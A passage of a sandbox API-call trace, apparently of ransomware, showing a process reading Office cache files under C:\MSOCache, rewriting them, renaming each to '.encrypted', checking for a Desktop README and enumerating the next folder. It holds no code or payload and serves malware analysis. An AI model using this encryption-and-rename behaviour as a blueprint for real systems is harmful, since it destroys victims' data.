"c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0178.288] GetFileType (hFile=0x2d8) returned 0x1 [0178.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0178.289] GetFileType (hFile=0x2d8) returned 0x1 [0178.289] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0xe21fcc [0178.352] ReadFile (in: hFile=0x2d8, lpBuffer=0xe551018, nNumberOfBytesToRead=0xe21fcc, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0xe551018*, lpNumberOfBytesRead=0x2ee7d4*=0xe21fcc, lpOverlapped=0x0) returned 1 [0178.695] CloseHandle (hObject=0x2d8) returned 1 [0179.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0179.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0179.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0179.676] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0179.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0179.676] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0179.680] GetFileType (hFile=0x2d8) returned 0x1 [0179.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0179.680] GetFileType (hFile=0x2d8) returned 0x1 [0179.680] WriteFile (in: hFile=0x2d8, lpBuffer=0x11551018*, nNumberOfBytesToWrite=0xe21fd0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x11551018*, lpNumberOfBytesWritten=0x2ee7c4*=0xe21fd0, lpOverlapped=0x0) returned 1 [0180.048] CloseHandle (hObject=0x2d8) returned 1 [0180.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0180.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.encrypted", lpFilePart=0x0) returned 0x54 [0180.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0180.345] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x512bbc80, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xe21fd0)) returned 1 [0180.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0180.346] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.encrypted")) returned 1 [0180.347] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0180.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0180.347] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.347] GetFileType (hFile=0x2d8) returned 0x1 [0180.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0180.348] GetFileType (hFile=0x2d8) returned 0x1 [0180.348] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0xc72 [0180.348] ReadFile (in: hFile=0x2d8, lpBuffer=0x231c980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x231c980*, lpNumberOfBytesRead=0x2ee7d4*=0xc72, lpOverlapped=0x0) returned 1 [0180.350] CloseHandle (hObject=0x2d8) returned 1 [0180.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0180.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0180.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0180.404] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0180.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0180.404] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.405] GetFileType (hFile=0x2d8) returned 0x1 [0180.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0180.405] GetFileType (hFile=0x2d8) returned 0x1 [0180.405] WriteFile (in: hFile=0x2d8, lpBuffer=0x236e828*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x236e828*, lpNumberOfBytesWritten=0x2ee798*=0xc80, lpOverlapped=0x0) returned 1 [0180.406] CloseHandle (hObject=0x2d8) returned 1 [0180.407] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0180.407] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.encrypted", lpFilePart=0x0) returned 0x57 [0180.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0180.407] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x51354200, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0180.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0180.407] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.encrypted")) returned 1 [0180.408] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0180.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0180.408] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.469] GetFileType (hFile=0x2d8) returned 0x1 [0180.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0180.469] GetFileType (hFile=0x2d8) returned 0x1 [0180.469] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x106f [0180.469] ReadFile (in: hFile=0x2d8, lpBuffer=0x236fb88, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x236fb88*, lpNumberOfBytesRead=0x2ee7d4*=0x106f, lpOverlapped=0x0) returned 1 [0180.471] CloseHandle (hObject=0x2d8) returned 1 [0180.488] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0180.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0180.488] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0180.488] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0180.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0180.488] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.489] GetFileType (hFile=0x2d8) returned 0x1 [0180.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0180.489] GetFileType (hFile=0x2d8) returned 0x1 [0180.489] WriteFile (in: hFile=0x2d8, lpBuffer=0x23c1b68*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x23c1b68*, lpNumberOfBytesWritten=0x2ee7c4*=0x1070, lpOverlapped=0x0) returned 1 [0180.490] CloseHandle (hObject=0x2d8) returned 1 [0180.491] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0180.491] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0180.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0180.491] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x514128e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1070)) returned 1 [0180.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0180.491] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0180.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0180.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0180.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0180.492] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eeeb0 [0180.493] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.494] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0180.494] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0180.494] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0180.494] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0180.494] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0180.494] FindClose (in: hFindFile=0x94eeeb0 | out: hFindFile=0x94eeeb0) returned 1 [0180.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0180.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0180.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0180.494] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0180.494] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0180.494] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eeeb0 [0180.495] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.495] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0180.495] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0180.495] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0180.495] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0180.495] FindNextFileW (in: hFindFile=0x94eeeb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0180.496] FindClose (in: 